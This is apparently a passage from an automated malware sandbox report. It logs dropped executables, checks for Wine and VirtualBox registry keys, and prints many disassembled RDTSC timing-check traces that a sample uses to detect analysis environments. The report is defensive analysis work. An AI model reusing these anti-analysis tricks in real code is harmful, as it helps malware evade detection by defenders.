GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_004195E0
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\1000003002\5aa32fec17.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 486E1F second address: 486E3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jmp 00007F2738B89E18h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 494F54 second address: 494F66 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738B89E0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 494F66 second address: 494F77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 494F77 second address: 494F7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 494F7B second address: 494F7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 494F7F second address: 494FC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F2738B89E0Bh 0x0000000b popad 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push edx 0x00000011 push edi 0x00000012 jnp 00007F2738B89E06h 0x00000018 pop edi 0x00000019 pop edx 0x0000001a pop eax 0x0000001b movsx ecx, si 0x0000001e mov esi, dword ptr [ebp+122D369Fh] 0x00000024 lea ebx, dword ptr [ebp+1245997Ah] 0x0000002a sub ch, FFFFFFA1h 0x0000002d mov edx, dword ptr [ebp+122D368Bh] 0x00000033 xchg eax, ebx 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 jmp 00007F2738B89E0Ah 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 494FC8 second address: 494FCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4B560C second address: 4B5612 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4B3521 second address: 4B3526 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4B3526 second address: 4B352C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4B352C second address: 4B3530 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4B36CA second address: 4B36D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4B36D0 second address: 4B3706 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738E98EF7h 0x00000007 jmp 00007F2738E98EF7h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4B3836 second address: 4B383C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4B383C second address: 4B3847 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4B3847 second address: 4B384D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4B3AC7 second address: 4B3ACC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4B3ACC second address: 4B3B04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007F2738B89E1Dh 0x0000000f push eax 0x00000010 pop eax 0x00000011 jmp 00007F2738B89E15h 0x00000016 jmp 00007F2738B89E12h 0x0000001b rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4B3B04 second address: 4B3B09 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4B40C6 second address: 4B40CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4B40CB second address: 4B40D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4B40D1 second address: 4B40D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4B40D5 second address: 4B40D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4B429F second address: 4B42B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738B89E0Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4B42B2 second address: 4B42B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4B42B8 second address: 4B42E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738B89E11h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push esi 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pop esi 0x00000012 pushad 0x00000013 jmp 00007F2738B89E0Ch 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4B45E7 second address: 4B45ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4B45ED second address: 4B45F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4B45F1 second address: 4B45FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A95B0 second address: 4A95DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2738B89E0Fh 0x00000009 je 00007F2738B89E06h 0x0000000f popad 0x00000010 jmp 00007F2738B89E12h 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A95DC second address: 4A95F7 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2738E98EEAh 0x00000008 pushad 0x00000009 js 00007F2738E98EE6h 0x0000000f jno 00007F2738E98EE6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4B471B second address: 4B4721 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4B4EAA second address: 4B4EB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4B4EB0 second address: 4B4EB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4B4EB4 second address: 4B4EBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4B5035 second address: 4B503B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4B540D second address: 4B5424 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738E98EF0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4B5424 second address: 4B542A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4B542A second address: 4B542F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4BA69B second address: 4BA69F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4BA7B9 second address: 4BA7BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 47E701 second address: 47E709 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 48DA46 second address: 48DA56 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F2738E98EE6h 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 483906 second address: 48391B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F2738B89E06h 0x0000000a popad 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e ja 00007F2738B89E06h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 48391B second address: 483921 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C3697 second address: 4C369C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C380E second address: 4C3812 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C3812 second address: 4C381C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C381C second address: 4C3820 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C3ACA second address: 4C3AE7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F2738B89E0Dh 0x0000000f jns 00007F2738B89E06h 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C3DDF second address: 4C3DE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C3DE3 second address: 4C3E06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F2738B89E1Fh 0x0000000e jmp 00007F2738B89E13h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C3E06 second address: 4C3E0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C3E0E second address: 4C3E12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C3E12 second address: 4C3E22 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F2738E98EE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 47CC13 second address: 47CC19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 47CC19 second address: 47CC1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 47CC1D second address: 47CC25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C74EF second address: 4C7502 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007F2738E98EE6h 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C7502 second address: 4C7508 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C7508 second address: 4C7535 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jmp 00007F2738E98EF6h 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push edx 0x00000014 jbe 00007F2738E98EECh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C7AFE second address: 4C7B1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2738B89E18h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C7CF4 second address: 4C7CF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C7CF8 second address: 4C7D13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738B89E17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C8164 second address: 4C8168 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C8168 second address: 4C816E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C816E second address: 4C8175 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C8175 second address: 4C8189 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebx 0x00000008 cld 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007F2738B89E0Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C8189 second address: 4C818D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C860C second address: 4C8620 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C8620 second address: 4C8625 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C8764 second address: 4C876E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C876E second address: 4C8772 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C95BD second address: 4C95C2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C95C2 second address: 4C961D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a sbb si, EBF7h 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007F2738E98EE8h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b push 00000000h 0x0000002d or si, 4645h 0x00000032 xchg eax, ebx 0x00000033 js 00007F2738E98EF2h 0x00000039 jmp 00007F2738E98EECh 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 push esi 0x00000042 jno 00007F2738E98EE6h 0x00000048 pop esi 0x00000049 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C961D second address: 4C9623 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4CA7DF second address: 4CA82A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738E98EF0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F2738E98EEAh 0x0000000f push 00000000h 0x00000011 pushad 0x00000012 mov ch, C4h 0x00000014 mov eax, 71DBBF09h 0x00000019 popad 0x0000001a push 00000000h 0x0000001c jo 00007F2738E98EF6h 0x00000022 jmp 00007F2738E98EF0h 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b pushad 0x0000002c popad 0x0000002d push esi 0x0000002e pop esi 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4CA82A second address: 4CA830 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4CA830 second address: 4CA834 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4CDD38 second address: 4CDD3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4CDD3D second address: 4CDD54 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2738E98EECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4CDD54 second address: 4CDD58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4CDD58 second address: 4CDD5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4CDD5E second address: 4CDD75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2738B89E13h 0x00000009 rdtsc
